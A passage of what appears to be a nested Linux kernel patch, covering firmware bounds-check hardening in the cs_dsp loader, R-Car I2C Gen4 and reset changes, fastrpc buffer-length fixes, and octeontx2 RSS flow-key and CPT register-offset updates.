+ 	adsp2_sizes = (void *)&firmware->data[pos];
++	if (sizeof(*adsp2_sizes) > firmware->size - pos) {
++		cs_dsp_err(dsp, "%s: file truncated\n", file);
++		return 0;
++	}
+ 
+ 	cs_dsp_dbg(dsp, "%s: %d XM, %d YM %d PM, %d ZM\n", file,
+ 		   le32_to_cpu(adsp2_sizes->xm), le32_to_cpu(adsp2_sizes->ym),
+@@ -1283,7 +1373,6 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 	struct regmap *regmap = dsp->regmap;
+ 	unsigned int pos = 0;
+ 	const struct wmfw_header *header;
+-	const struct wmfw_adsp1_sizes *adsp1_sizes;
+ 	const struct wmfw_footer *footer;
+ 	const struct wmfw_region *region;
+ 	const struct cs_dsp_region *mem;
+@@ -1296,10 +1385,8 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 
+ 	ret = -EINVAL;
+ 
+-	pos = sizeof(*header) + sizeof(*adsp1_sizes) + sizeof(*footer);
+-	if (pos >= firmware->size) {
+-		cs_dsp_err(dsp, "%s: file too short, %zu bytes\n",
+-			   file, firmware->size);
++	if (sizeof(*header) >= firmware->size) {
++		ret = -EOVERFLOW;
+ 		goto out_fw;
+ 	}
+ 
+@@ -1327,22 +1414,36 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 
+ 	pos = sizeof(*header);
+ 	pos = dsp->ops->parse_sizes(dsp, file, pos, firmware);
++	if ((pos == 0) || (sizeof(*footer) > firmware->size - pos)) {
++		ret = -EOVERFLOW;
++		goto out_fw;
++	}
+ 
+ 	footer = (void *)&firmware->data[pos];
+ 	pos += sizeof(*footer);
+ 
+ 	if (le32_to_cpu(header->len) != pos) {
+-		cs_dsp_err(dsp, "%s: unexpected header length %d\n",
+-			   file, le32_to_cpu(header->len));
++		ret = -EOVERFLOW;
+ 		goto out_fw;
+ 	}
+ 
+ 	cs_dsp_dbg(dsp, "%s: timestamp %llu\n", file,
+ 		   le64_to_cpu(footer->timestamp));
+ 
+-	while (pos < firmware->size &&
+-	       sizeof(*region) < firmware->size - pos) {
++	while (pos < firmware->size) {
++		/* Is there enough data for a complete block header? */
++		if (sizeof(*region) > firmware->size - pos) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		region = (void *)&(firmware->data[pos]);
++
++		if (le32_to_cpu(region->len) > firmware->size - pos - sizeof(*region)) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		region_name = "Unknown";
+ 		reg = 0;
+ 		text = NULL;
+@@ -1399,16 +1500,6 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 			   regions, le32_to_cpu(region->len), offset,
+ 			   region_name);
+ 
+-		if (le32_to_cpu(region->len) >
+-		    firmware->size - pos - sizeof(*region)) {
+-			cs_dsp_err(dsp,
+-				   "%s.%d: %s region len %d bytes exceeds file length %zu\n",
+-				   file, regions, region_name,
+-				   le32_to_cpu(region->len), firmware->size);
+-			ret = -EINVAL;
+-			goto out_fw;
+-		}
+-
+ 		if (text) {
+ 			memcpy(text, region->data, le32_to_cpu(region->len));
+ 			cs_dsp_info(dsp, "%s: %s\n", file, text);
+@@ -1459,6 +1550,9 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 	cs_dsp_buf_free(&buf_list);
+ 	kfree(text);
+ 
++	if (ret == -EOVERFLOW)
++		cs_dsp_err(dsp, "%s: file content overflows file data\n", file);
++
+ 	return ret;
+ }
+ 
+@@ -2026,10 +2120,20 @@ static int cs_dsp_load_coeff(struct cs_dsp *dsp, const struct firmware *firmware
+ 	pos = le32_to_cpu(hdr->len);
+ 
+ 	blocks = 0;
+-	while (pos < firmware->size &&
+-	       sizeof(*blk) < firmware->size - pos) {
++	while (pos < firmware->size) {
++		/* Is there enough data for a complete block header? */
++		if (sizeof(*blk) > firmware->size - pos) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		blk = (void *)(&firmware->data[pos]);
+ 
++		if (le32_to_cpu(blk->len) > firmware->size - pos - sizeof(*blk)) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		type = le16_to_cpu(blk->type);
+ 		offset = le16_to_cpu(blk->offset);
+ 		version = le32_to_cpu(blk->ver) >> 8;
+@@ -2125,17 +2229,6 @@ static int cs_dsp_load_coeff(struct cs_dsp *dsp, const struct firmware *firmware
+ 		}
+ 
+ 		if (reg) {
+-			if (le32_to_cpu(blk->len) >
+-			    firmware->size - pos - sizeof(*blk)) {
+-				cs_dsp_err(dsp,
+-					   "%s.%d: %s region len %d bytes exceeds file length %zu\n",
+-					   file, blocks, region_name,
+-					   le32_to_cpu(blk->len),
+-					   firmware->size);
+-				ret = -EINVAL;
+-				goto out_fw;
+-			}
+-
+ 			buf = cs_dsp_buf_alloc(blk->data,
+ 					       le32_to_cpu(blk->len),
+ 					       &buf_list);
+@@ -2175,6 +2268,10 @@ static int cs_dsp_load_coeff(struct cs_dsp *dsp, const struct firmware *firmware
+ 	regmap_async_complete(regmap);
+ 	cs_dsp_buf_free(&buf_list);
+ 	kfree(text);
++
++	if (ret == -EOVERFLOW)
++		cs_dsp_err(dsp, "%s: file content overflows file data\n", file);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-rcar.c b/drivers/i2c/busses/i2c-rcar.c
+index cef82b205c261..d0098e342ba22 100644
+--- a/drivers/i2c/busses/i2c-rcar.c
++++ b/drivers/i2c/busses/i2c-rcar.c
+@@ -114,6 +114,7 @@ enum rcar_i2c_type {
+ 	I2C_RCAR_GEN1,
+ 	I2C_RCAR_GEN2,
+ 	I2C_RCAR_GEN3,
++	I2C_RCAR_GEN4,
+ };
+ 
+ struct rcar_i2c_priv {
+@@ -223,6 +224,14 @@ static void rcar_i2c_init(struct rcar_i2c_priv *priv)
+ 
+ }
+ 
++static void rcar_i2c_reset_slave(struct rcar_i2c_priv *priv)
++{
++	rcar_i2c_write(priv, ICSIER, 0);
++	rcar_i2c_write(priv, ICSSR, 0);
++	rcar_i2c_write(priv, ICSCR, SDBS);
++	rcar_i2c_write(priv, ICSAR, 0); /* Gen2: must be 0 if not using slave */
++}
++
+ static int rcar_i2c_bus_barrier(struct rcar_i2c_priv *priv)
+ {
+ 	int ret;
+@@ -386,8 +395,8 @@ static void rcar_i2c_cleanup_dma(struct rcar_i2c_priv *priv, bool terminate)
+ 	dma_unmap_single(chan->device->dev, sg_dma_address(&priv->sg),
+ 			 sg_dma_len(&priv->sg), priv->dma_direction);
+ 
+-	/* Gen3 can only do one RXDMA per transfer and we just completed it */
+-	if (priv->devtype == I2C_RCAR_GEN3 &&
++	/* Gen3+ can only do one RXDMA per transfer and we just completed it */
++	if (priv->devtype >= I2C_RCAR_GEN3 &&
+ 	    priv->dma_direction == DMA_FROM_DEVICE)
+ 		priv->flags |= ID_P_NO_RXDMA;
+ 
+@@ -815,6 +824,10 @@ static int rcar_i2c_do_reset(struct rcar_i2c_priv *priv)
+ {
+ 	int ret;
+ 
++	/* Don't reset if a slave instance is currently running */
++	if (priv->slave)
++		return -EISCONN;
++
+ 	ret = reset_control_reset(priv->rstc);
+ 	if (ret)
+ 		return ret;
+@@ -841,14 +854,12 @@ static int rcar_i2c_master_xfer(struct i2c_adapter *adap,
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	/* Gen3 needs a reset before allowing RXDMA once */
+-	if (priv->devtype == I2C_RCAR_GEN3) {
+-		priv->flags |= ID_P_NO_RXDMA;
+-		if (!IS_ERR(priv->rstc)) {
+-			ret = rcar_i2c_do_reset(priv);
+-			if (ret == 0)
+-				priv->flags &= ~ID_P_NO_RXDMA;
+-		}
++	/* Gen3+ needs a reset. That also allows RXDMA once */
++	if (priv->devtype >= I2C_RCAR_GEN3) {
++		ret = rcar_i2c_do_reset(priv);
++		if (ret)
++			goto out;
++		priv->flags &= ~ID_P_NO_RXDMA;
+ 	}
+ 
+ 	rcar_i2c_init(priv);
+@@ -975,11 +986,8 @@ static int rcar_unreg_slave(struct i2c_client *slave)
+ 
+ 	/* ensure no irq is running before clearing ptr */
+ 	disable_irq(priv->irq);
+-	rcar_i2c_write(priv, ICSIER, 0);
+-	rcar_i2c_write(priv, ICSSR, 0);
++	rcar_i2c_reset_slave(priv);
+ 	enable_irq(priv->irq);
+-	rcar_i2c_write(priv, ICSCR, SDBS);
+-	rcar_i2c_write(priv, ICSAR, 0); /* Gen2: must be 0 if not using slave */
+ 
+ 	priv->slave = NULL;
+ 
+@@ -1032,7 +1040,7 @@ static const struct of_device_id rcar_i2c_dt_ids[] = {
+ 	{ .compatible = "renesas,rcar-gen1-i2c", .data = (void *)I2C_RCAR_GEN1 },
+ 	{ .compatible = "renesas,rcar-gen2-i2c", .data = (void *)I2C_RCAR_GEN2 },
+ 	{ .compatible = "renesas,rcar-gen3-i2c", .data = (void *)I2C_RCAR_GEN3 },
+-	{ .compatible = "renesas,rcar-gen4-i2c", .data = (void *)I2C_RCAR_GEN3 },
++	{ .compatible = "renesas,rcar-gen4-i2c", .data = (void *)I2C_RCAR_GEN4 },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, rcar_i2c_dt_ids);
+@@ -1092,22 +1100,15 @@ static int rcar_i2c_probe(struct platform_device *pdev)
+ 		goto out_pm_disable;
+ 	}
+ 
+-	rcar_i2c_write(priv, ICSAR, 0); /* Gen2: must be 0 if not using slave */
++	/* Bring hardware to known state */
++	rcar_i2c_init(priv);
++	rcar_i2c_reset_slave(priv);
+ 
+ 	if (priv->devtype < I2C_RCAR_GEN3) {
+ 		irqflags |= IRQF_NO_THREAD;
+ 		irqhandler = rcar_i2c_gen2_irq;
+ 	}
+ 
+-	if (priv->devtype == I2C_RCAR_GEN3) {
+-		priv->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+-		if (!IS_ERR(priv->rstc)) {
+-			ret = reset_control_status(priv->rstc);
+-			if (ret < 0)
+-				priv->rstc = ERR_PTR(-ENOTSUPP);
+-		}
+-	}
+-
+ 	/* Stay always active when multi-master to keep arbitration working */
+ 	if (of_property_read_bool(dev->of_node, "multi-master"))
+ 		priv->flags |= ID_P_PM_BLOCKED;
+@@ -1117,6 +1118,22 @@ static int rcar_i2c_probe(struct platform_device *pdev)
+ 	if (of_property_read_bool(dev->of_node, "smbus"))
+ 		priv->flags |= ID_P_HOST_NOTIFY;
+ 
++	/* R-Car Gen3+ needs a reset before every transfer */
++	if (priv->devtype >= I2C_RCAR_GEN3) {
++		priv->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
++		if (IS_ERR(priv->rstc)) {
++			ret = PTR_ERR(priv->rstc);
++			goto out_pm_put;
++		}
++
++		ret = reset_control_status(priv->rstc);
++		if (ret < 0)
++			goto out_pm_put;
++
++		/* hard reset disturbs HostNotify local target, so disable it */
++		priv->flags &= ~ID_P_HOST_NOTIFY;
++	}
++
+ 	ret = platform_get_irq(pdev, 0);
+ 	if (ret < 0)
+ 		goto out_pm_put;
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 8af82f42af30b..d6a879f1542c5 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -1049,6 +1049,7 @@ EXPORT_SYMBOL(i2c_find_device_by_fwnode);
+ 
+ static const struct i2c_device_id dummy_id[] = {
+ 	{ "dummy", 0 },
++	{ "smbus_host_notify", 0 },
+ 	{ },
+ };
+ 
+diff --git a/drivers/i2c/i2c-slave-testunit.c b/drivers/i2c/i2c-slave-testunit.c
+index 54c08f48a8b85..b9967a5a7d255 100644
+--- a/drivers/i2c/i2c-slave-testunit.c
++++ b/drivers/i2c/i2c-slave-testunit.c
+@@ -118,6 +118,13 @@ static int i2c_slave_testunit_slave_cb(struct i2c_client *client,
+ 			queue_delayed_work(system_long_wq, &tu->worker,
+ 					   msecs_to_jiffies(10 * tu->regs[TU_REG_DELAY]));
+ 		}
++
++		/*
++		 * Reset reg_idx to avoid that work gets queued again in case of
++		 * STOP after a following read message. But do not clear TU regs
++		 * here because we still need them in the workqueue!
++		 */
++		tu->reg_idx = 0;
+ 		break;
+ 
+ 	case I2C_SLAVE_WRITE_REQUESTED:
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 69cc24962706c..6c94364019c81 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -1509,16 +1509,20 @@ static int fastrpc_get_info_from_dsp(struct fastrpc_user *fl, uint32_t *dsp_attr
+ {
+ 	struct fastrpc_invoke_args args[2] = { 0 };
+ 
+-	/* Capability filled in userspace */
++	/*
++	 * Capability filled in userspace. This carries the information
++	 * about the remoteproc support which is fetched from the remoteproc
++	 * sysfs node by userspace.
++	 */
+ 	dsp_attr_buf[0] = 0;
++	dsp_attr_buf_len -= 1;
+ 
+ 	args[0].ptr = (u64)(uintptr_t)&dsp_attr_buf_len;
+ 	args[0].length = sizeof(dsp_attr_buf_len);
+ 	args[0].fd = -1;
+ 	args[1].ptr = (u64)(uintptr_t)&dsp_attr_buf[1];
+-	args[1].length = dsp_attr_buf_len;
++	args[1].length = dsp_attr_buf_len * sizeof(u32);
+ 	args[1].fd = -1;
+-	fl->pd = USER_PD;
+ 
+ 	return fastrpc_internal_invoke(fl, true, FASTRPC_DSP_UTILITIES_HANDLE,
+ 				       FASTRPC_SCALARS(0, 1, 1), args);
+@@ -1546,7 +1550,7 @@ static int fastrpc_get_info_from_kernel(struct fastrpc_ioctl_capability *cap,
+ 	if (!dsp_attributes)
+ 		return -ENOMEM;
+ 
+-	err = fastrpc_get_info_from_dsp(fl, dsp_attributes, FASTRPC_MAX_DSP_ATTRIBUTES_LEN);
++	err = fastrpc_get_info_from_dsp(fl, dsp_attributes, FASTRPC_MAX_DSP_ATTRIBUTES);
+ 	if (err == DSP_UNSUPPORTED_API) {
+ 		dev_info(&cctx->rpdev->dev,
+ 			 "Warning: DSP capabilities not supported on domain: %d\n", domain);
+@@ -1599,7 +1603,7 @@ static int fastrpc_get_dsp_info(struct fastrpc_user *fl, char __user *argp)
+ 	if (err)
+ 		return err;
+ 
+-	if (copy_to_user(argp, &cap.capability, sizeof(cap.capability)))
++	if (copy_to_user(argp, &cap, sizeof(cap)))
+ 		return -EFAULT;
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 9efd4b962dce2..1194dcacbd29e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -13315,6 +13315,10 @@ static int i40e_xdp_setup(struct i40e_vsi *vsi, struct bpf_prog *prog,
+ 	bool need_reset;
+ 	int i;
+ 
++	/* VSI shall be deleted in a moment, block loading new programs */
++	if (prog && test_bit(__I40E_IN_REMOVE, pf->state))
++		return -EINVAL;
++
+ 	/* Don't allow frames that span over multiple buffers */
+ 	if (frame_size > i40e_calculate_vsi_rx_buf_len(vsi)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MTU too large to enable XDP");
+@@ -13323,14 +13327,9 @@ static int i40e_xdp_setup(struct i40e_vsi *vsi, struct bpf_prog *prog,
+ 
+ 	/* When turning XDP on->off/off->on we reset and rebuild the rings. */
+ 	need_reset = (i40e_enabled_xdp_vsi(vsi) != !!prog);
+-
+ 	if (need_reset)
+ 		i40e_prep_for_reset(pf);
+ 
+-	/* VSI shall be deleted in a moment, just return EINVAL */
+-	if (test_bit(__I40E_IN_REMOVE, pf->state))
+-		return -EINVAL;
+-
+ 	old_prog = xchg(&vsi->xdp_prog, prog);
+ 
+ 	if (need_reset) {
+diff --git a/drivers/net/ethernet/lantiq_etop.c b/drivers/net/ethernet/lantiq_etop.c
+index f5961bdcc4809..61baf1da76eea 100644
+--- a/drivers/net/ethernet/lantiq_etop.c
++++ b/drivers/net/ethernet/lantiq_etop.c
+@@ -217,9 +217,9 @@ ltq_etop_free_channel(struct net_device *dev, struct ltq_etop_chan *ch)
+ 	if (ch->dma.irq)
+ 		free_irq(ch->dma.irq, priv);
+ 	if (IS_RX(ch->idx)) {
+-		int desc;
++		struct ltq_dma_channel *dma = &ch->dma;
+ 
+-		for (desc = 0; desc < LTQ_DESC_NUM; desc++)
++		for (dma->desc = 0; dma->desc < LTQ_DESC_NUM; dma->desc++)
+ 			dev_kfree_skb_any(ch->skb[ch->dma.desc]);
+ 	}
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index be70269e91684..c288589446935 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -1084,6 +1084,8 @@ struct nix_vtag_config_rsp {
+ 	 */
+ };
+ 
++#define NIX_FLOW_KEY_TYPE_L3_L4_MASK (~(0xf << 28))
++
+ struct nix_rss_flowkey_cfg {
+ 	struct mbox_msghdr hdr;
+ 	int	mcam_index;  /* MCAM entry index to modify */
+@@ -1109,6 +1111,10 @@ struct nix_rss_flowkey_cfg {
+ #define NIX_FLOW_KEY_TYPE_IPV4_PROTO	BIT(21)
+ #define NIX_FLOW_KEY_TYPE_AH		BIT(22)
+ #define NIX_FLOW_KEY_TYPE_ESP		BIT(23)
++#define NIX_FLOW_KEY_TYPE_L4_DST_ONLY BIT(28)
++#define NIX_FLOW_KEY_TYPE_L4_SRC_ONLY BIT(29)
++#define NIX_FLOW_KEY_TYPE_L3_DST_ONLY BIT(30)
++#define NIX_FLOW_KEY_TYPE_L3_SRC_ONLY BIT(31)
+ 	u32	flowkey_cfg; /* Flowkey types selected */
+ 	u8	group;       /* RSS context or group */
+ };
+@@ -1627,7 +1633,9 @@ struct cpt_lf_alloc_req_msg {
+ 	u16 nix_pf_func;
+ 	u16 sso_pf_func;
+ 	u16 eng_grpmsk;
+-	int blkaddr;
++	u8 blkaddr;
++	u8 ctx_ilen_valid : 1;
++	u8 ctx_ilen : 7;
+ };
+ 
+ #define CPT_INLINE_INBOUND      0
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/npc.h b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+index aaff91bc7415a..32a9425a2b1ea 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/npc.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+@@ -63,8 +63,13 @@ enum npc_kpu_lb_ltype {
+ 	NPC_LT_LB_CUSTOM1 = 0xF,
+ };
+ 
++/* Don't modify ltypes up to IP6_EXT, otherwise length and checksum of IP
++ * headers may not be checked correctly. IPv4 ltypes and IPv6 ltypes must
++ * differ only at bit 0 so mask 0xE can be used to detect extended headers.
++ */
+ enum npc_kpu_lc_ltype {
+-	NPC_LT_LC_IP = 1,
++	NPC_LT_LC_PTP = 1,
++	NPC_LT_LC_IP,
+ 	NPC_LT_LC_IP_OPT,
+ 	NPC_LT_LC_IP6,
+ 	NPC_LT_LC_IP6_EXT,
+@@ -72,7 +77,6 @@ enum npc_kpu_lc_ltype {
+ 	NPC_LT_LC_RARP,
+ 	NPC_LT_LC_MPLS,
+ 	NPC_LT_LC_NSH,
+-	NPC_LT_LC_PTP,
+ 	NPC_LT_LC_FCOE,
+ 	NPC_LT_LC_NGIO,
+ 	NPC_LT_LC_CUSTOM0 = 0xE,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index a7034b47ed6c9..c7829265eade9 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -1638,7 +1638,7 @@ static int rvu_check_rsrc_availability(struct rvu *rvu,
+ 		if (req->ssow > block->lf.max) {
+ 			dev_err(&rvu->pdev->dev,
+ 				"Func 0x%x: Invalid SSOW req, %d > max %d\n",
+-				 pcifunc, req->sso, block->lf.max);
++				 pcifunc, req->ssow, block->lf.max);
+ 			return -EINVAL;
+ 		}
+ 		mappedlfs = rvu_get_rsrc_mapcount(pfvf, block->addr);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+index 6fb02b93c1718..b226a4d376aab 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+@@ -17,7 +17,7 @@
+ #define	PCI_DEVID_OTX2_CPT10K_PF 0xA0F2
+ 
+ /* Length of initial context fetch in 128 byte words */
+-#define CPT_CTX_ILEN    2ULL
++#define CPT_CTX_ILEN    1ULL
+ 
+ #define cpt_get_eng_sts(e_min, e_max, rsp, etype)                   \
+ ({                                                                  \
+@@ -429,8 +429,12 @@ int rvu_mbox_handler_cpt_lf_alloc(struct rvu *rvu,
+ 
+ 		/* Set CPT LF group and priority */
+ 		val = (u64)req->eng_grpmsk << 48 | 1;
+-		if (!is_rvu_otx2(rvu))
+-			val |= (CPT_CTX_ILEN << 17);
++		if (!is_rvu_otx2(rvu)) {
++			if (req->ctx_ilen_valid)
++				val |= (req->ctx_ilen << 17);
++			else
++				val |= (CPT_CTX_ILEN << 17);
++		}
+ 
+ 		rvu_write64(rvu, blkaddr, CPT_AF_LFX_CTL(cptlf), val);
+ 
+@@ -692,7 +696,8 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 					struct cpt_rd_wr_reg_msg *req,
+ 					struct cpt_rd_wr_reg_msg *rsp)
+ {
+-	int blkaddr;
++	u64 offset = req->reg_offset;
++	int blkaddr, lf;
+ 
+ 	blkaddr = validate_and_get_cpt_blkaddr(req->blkaddr);
+ 	if (blkaddr < 0)
+@@ -703,17 +708,25 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 	    !is_cpt_vf(rvu, req->hdr.pcifunc))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
+-	rsp->reg_offset = req->reg_offset;
+-	rsp->ret_val = req->ret_val;
+-	rsp->is_write = req->is_write;
+-
+ 	if (!is_valid_offset(rvu, req))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
++	/* Translate local LF used by VFs to global CPT LF */
++	lf = rvu_get_lf(rvu, &rvu->hw->block[blkaddr], req->hdr.pcifunc,
++			(offset & 0xFFF) >> 3);
++
++	/* Translate local LF's offset to global CPT LF's offset */
++	offset &= 0xFF000;
++	offset += lf << 3;
++
++	rsp->reg_offset = offset;
++	rsp->ret_val = req->ret_val;
++	rsp->is_write = req->is_write;
++
+ 	if (req->is_write)
+-		rvu_write64(rvu, blkaddr, req->reg_offset, req->val);
++		rvu_write64(rvu, blkaddr, offset, req->val);
+ 	else
+-		rsp->val = rvu_read64(rvu, blkaddr, req->reg_offset);
++		rsp->val = rvu_read64(rvu, blkaddr, offset);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 67080d5053e07..ef526408b0bd2 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -3354,6 +3354,11 @@ static int get_flowkey_alg_idx(struct nix_hw *nix_hw, u32 flow_cfg)
+ 	return -ERANGE;
+ }
+ 
++/* Mask to match ipv6(NPC_LT_LC_IP6) and ipv6 ext(NPC_LT_LC_IP6_EXT) */
++#define NPC_LT_LC_IP6_MATCH_MSK ((~(NPC_LT_LC_IP6 ^ NPC_LT_LC_IP6_EXT)) & 0xf)
++/* Mask to match both ipv4(NPC_LT_LC_IP) and ipv4 ext(NPC_LT_LC_IP_OPT) */
++#define NPC_LT_LC_IP_MATCH_MSK  ((~(NPC_LT_LC_IP ^ NPC_LT_LC_IP_OPT)) & 0xf)
++
+ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ {
+ 	int idx, nr_field, key_off, field_marker, keyoff_marker;
+@@ -3361,6 +3366,7 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 	struct nix_rx_flowkey_alg *field;
+ 	struct nix_rx_flowkey_alg tmp;
+ 	u32 key_type, valid_key;
++	u32 l3_l4_src_dst;
+ 	int l4_key_offset = 0;
+ 
+ 	if (!alg)
+@@ -3388,6 +3394,15 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 	 * group_member - Enabled when protocol is part of a group.
+ 	 */
+ 
++	/* Last 4 bits (31:28) are reserved to specify SRC, DST
++	 * selection for L3, L4 i.e IPV[4,6]_SRC, IPV[4,6]_DST,
++	 * [TCP,UDP,SCTP]_SRC, [TCP,UDP,SCTP]_DST
++	 * 31 => L3_SRC, 30 => L3_DST, 29 => L4_SRC, 28 => L4_DST
++	 */
++	l3_l4_src_dst = flow_cfg;
++	/* Reset these 4 bits, so that these won't be part of key */
++	flow_cfg &= NIX_FLOW_KEY_TYPE_L3_L4_MASK;
++
+ 	keyoff_marker = 0; max_key_off = 0; group_member = 0;
+ 	nr_field = 0; key_off = 0; field_marker = 1;
+ 	field = &tmp; max_bit_pos = fls(flow_cfg);
+@@ -3413,7 +3428,7 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 			field->hdr_offset = 9; /* offset */
+ 			field->bytesm1 = 0; /* 1 byte */
+ 			field->ltype_match = NPC_LT_LC_IP;
+-			field->ltype_mask = 0xF;
++			field->ltype_mask = NPC_LT_LC_IP_MATCH_MSK;
+ 			break;
+ 		case NIX_FLOW_KEY_TYPE_IPV4:
+ 		case NIX_FLOW_KEY_TYPE_INNR_IPV4:
+@@ -3425,7 +3440,22 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 			}
+ 			field->hdr_offset = 12; /* SIP offset */
+ 			field->bytesm1 = 7; /* SIP + DIP, 8 bytes */
+-			field->ltype_mask = 0xF; /* Match only IPv4 */
++
++			/* Only SIP */
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_SRC_ONLY)
++				field->bytesm1 = 3; /* SIP, 4 bytes */
++
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_DST_ONLY) {
++				/* Both SIP + DIP */
++				if (field->bytesm1 == 3) {
++					field->bytesm1 = 7; /* SIP + DIP, 8B */
++				} else {
++					/* Only DIP */
++					field->hdr_offset = 16; /* DIP off */
++					field->bytesm1 = 3; /* DIP, 4 bytes */
++				}
++			}
++			field->ltype_mask = NPC_LT_LC_IP_MATCH_MSK;
+ 			keyoff_marker = false;
+ 			break;
+ 		case NIX_FLOW_KEY_TYPE_IPV6:
+@@ -3438,7 +3468,23 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 			}
+ 			field->hdr_offset = 8; /* SIP offset */
+ 			field->bytesm1 = 31; /* SIP + DIP, 32 bytes */
+-			field->ltype_mask = 0xF; /* Match only IPv6 */
++
++			/* Only SIP */
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_SRC_ONLY)
++				field->bytesm1 = 15; /* SIP, 16 bytes */
++
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_DST_ONLY) {
++				/* Both SIP + DIP */
++				if (field->bytesm1 == 15) {
++					/* SIP + DIP, 32 bytes */
++					field->bytesm1 = 31;
++				} else {
++					/* Only DIP */
++					field->hdr_offset = 24; /* DIP off */
++					field->bytesm1 = 15; /* DIP,16 bytes */
++				}
++			}
++			field->ltype_mask = NPC_LT_LC_IP6_MATCH_MSK;
+ 			break;
+ 		case NIX_FLOW_KEY_TYPE_TCP:
+ 		case NIX_FLOW_KEY_TYPE_UDP:
+@@ -3453,6 +3499,21 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 				field->lid = NPC_LID_LH;
+ 			field->bytesm1 = 3; /* Sport + Dport, 4 bytes */
+ 
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L4_SRC_ONLY)
++				field->bytesm1 = 1; /* SRC, 2 bytes */
++
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L4_DST_ONLY) {
++				/* Both SRC + DST */
++				if (field->bytesm1 == 1) {
++					/* SRC + DST, 4 bytes */
++					field->bytesm1 = 3;
++				} else {
++					/* Only DIP */
++					field->hdr_offset = 2; /* DST off */
++					field->bytesm1 = 1; /* DST, 2 bytes */
++				}
++			}
++
+ 			/* Enum values for NPC_LID_LD and NPC_LID_LG are same,
+ 			 * so no need to change the ltype_match, just change
+ 			 * the lid for inner protocols
+diff --git a/drivers/net/ethernet/mediatek/mtk_star_emac.c b/drivers/net/ethernet/mediatek/mtk_star_emac.c
+index 7050351250b7a..ad27749c0931c 100644
+--- a/drivers/net/ethernet/mediatek/mtk_star_emac.c
++++ b/drivers/net/ethernet/mediatek/mtk_star_emac.c
+@@ -1531,6 +1531,7 @@ static int mtk_star_probe(struct platform_device *pdev)
+ {
+ 	struct device_node *of_node;
+ 	struct mtk_star_priv *priv;
++	struct phy_device *phydev;
+ 	struct net_device *ndev;
+ 	struct device *dev;
+ 	void __iomem *base;
+@@ -1656,6 +1657,12 @@ static int mtk_star_probe(struct platform_device *pdev)
+ 	netif_napi_add(ndev, &priv->rx_napi, mtk_star_rx_poll);
